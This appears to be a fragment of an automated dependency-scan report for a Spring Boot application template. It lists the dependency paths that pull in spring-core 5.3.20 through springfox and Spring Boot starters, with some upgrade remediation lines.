  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
